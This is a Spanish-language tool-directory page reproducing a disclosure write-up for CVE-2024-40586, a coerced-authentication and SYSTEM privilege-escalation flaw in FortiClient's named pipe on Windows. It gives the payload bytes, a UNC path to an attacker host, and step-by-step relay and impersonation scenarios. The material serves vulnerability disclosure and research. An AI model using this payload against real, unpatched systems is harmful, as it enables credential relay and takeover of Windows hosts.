Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient | Kitploit
Herramientas/GitHubGitHub/hagrid29/cve-2024-40586-windows-coerced-authentication-in-forticlient
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónMovimiento LateralPruebas de PenetraciónAutenticaciónRed Teaming
GitHubhagrid29/cve-2024-40586-windows-coerced-authentication-in-forticlient

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient

Ver Repositorio
1hace 1 añoAún no revisado

CVE-2024-40586 Autenticación Coaccionada de Windows en FortiClient

En sistemas Windows, se encontró que FortiClient (versión de la aplicación 7.0.8.0427) permite a un usuario remoto sin privilegios coaccionar a los hosts de Windows para que se autentiquen en otras máquinas a través de una tubería con nombre (named pipe) responsable del servicio FortiSSLVPNdaemon.

Se observó que la tubería con nombre "FortiSslvpnNamedPipe" permite LECTURA y ESCRITURA desde cualquier usuario.

Fig1

Análisis

La aplicación lee el quinto byte del búfer de la tubería con nombre como código de operación PipeBuffer+4

Fig2

Se observó que la aplicación leerá un archivo si el código de operación es igual a 24 (es decir, 0x18).

Flujo de código: Case 24 => LABEL_26 => strncpy copia el payload a la variable Buffer => pasa el payload a sub_7FF60C3EAC20 => llama a CreateFileA => ReadFile

Fig3

Fig4

Fig5

Sin embargo, la aplicación no hace nada con el contenido del archivo.

Explotación

Podemos enviar tráfico manipulado (es decir, "\x00\x00\x00\x00\x18\x00" concatenado con la ruta de destino) a la tubería con nombre vulnerable "FortiSslvpnNamedPipe" para activar el código de operación 24 y obligar al proceso "FortiSSLVPNdaemon.exe" a llamar a CreateFileA con privilegio de SYSTEM. Por lo tanto, podemos forzar al servidor a conectarse a un archivo remoto enviando una ruta UNC (por ejemplo, "\\<IP remota>\<ruta de archivo>") o conectarse a una tubería con nombre local (por ejemplo, "\\127.0.0.1\pipe\<tubería con nombre>").

Escenario 1

Para coaccionar a los hosts de Windows a autenticarse en otras máquinas con un usuario remoto no autenticado, el usuario podría seguir los siguientes pasos:

  1. En la máquina del atacante, inicie un listener para recibir la autenticación coaccionada.
  2. En la máquina del atacante, envíe el payload manipulado (es decir, "\x00\x00\x00\x00\x18\x00" + "\\<IP del atacante>\fake\fake") a la tubería con nombre vulnerable de la máquina víctima "\\<IP de la víctima>\pipe\FortiSslvpnNamedPipe" para obligar al proceso a conectarse a un archivo remoto con la ruta UNC "\\<IP del atacante>\fake\fake"
  3. Similar a otros ataques de autenticación coaccionada (por ejemplo, SpoolSample), el atacante podría realizar un ataque de relay o un ataque de degradación de autenticación.

Fig6

Escenario 2

Para realizar una escalada de privilegios a SYSTEM desde un usuario local con "SeImpersonatePrivilege" (por ejemplo, "nt authority\network service"), el usuario podría seguir los siguientes pasos:

  1. Cree un servidor de tubería con nombre que espere una conexión.
  2. Envíe el payload manipulado (es decir, "\x00\x00\x00\x00\x18\x00" + "\\127.0.0.1\pipe\<servidor de pipe>\XXX") a la tubería con nombre vulnerable local "\\.\pipe\FortiSslvpnNamedPipe" para obligar al proceso a conectarse a nuestro servidor de tubería con nombre.
  3. Una vez que llegue la conexión, llame a ImpersonateNamedPipeClient() para suplantar el privilegio de SYSTEM.

Fig7

Cronología

  • 07/09/2023 - Vulnerabilidad reportada a Fortinet
  • 08/30/2023 - Fortinet confirmó la vulnerabilidad
  • 02/11/2024 - Publicación

Referencia

  • https://fortiguard.fortinet.com/psirt/FG-IR-23-279
Descargar herramienta